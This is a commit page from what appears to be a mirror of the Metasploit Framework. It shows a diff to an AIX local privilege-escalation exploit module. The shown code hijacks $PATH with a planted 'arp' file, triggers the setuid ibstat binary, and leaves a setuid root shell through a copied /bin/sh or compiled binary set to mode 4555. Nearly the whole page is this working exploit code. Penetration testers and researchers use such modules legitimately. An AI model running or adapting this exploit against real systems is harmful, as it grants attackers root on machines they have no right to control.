infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix $PATH issues. Add FileDropper functionality

bug/bundler_fix
Sagi Shahar 2014-03-02 20:43:17 +02:00
parent e6c1dd3f9e
commit a005d69b16
1 changed files with 6 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/exploits/aix/local/ibstat_path.rb
View File

@ -7,6 +7,7 @@ class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info,
@ -90,23 +91,23 @@ chmod 4555 #{root_file}
print_status("Compiling source...")
cmd_exec "gcc -o #{root_file} #{root_file}.c"
print_status("Compilation completed")
print_status("Deleting source...")
file_rm("#{root_file}.c")
register_file_for_cleanup("#{root_file}.c")
else
cmd_exec "cp /bin/sh #{root_file}"
end
print_status("Writing custom arp file...")
write_file("#{arp_file}",arp)
register_file_for_cleanup("#{arp_file}")
cmd_exec "chmod 0555 #{arp_file}"
print_status("Custom arp file written")
print_status("Updating $PATH environment variable...")
path_env = cmd_exec 'echo $PATH'
cmd_exec 'PATH=.:$PATH'
cmd_exec "PATH=#{datastore["WritableDir"]}:$PATH"
cmd_exec 'export PATH'
print_status("Triggering vulnerablity...")
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
print_status("Removing custom arp...")
file_rm("#{arp_file}")
# The $PATH variable must be restored before the payload is executed
# in cases where an euid root shell was gained
print_status('Restoring $PATH environment variable...')
cmd_exec "PATH=#{path_env}"
cmd_exec 'export PATH'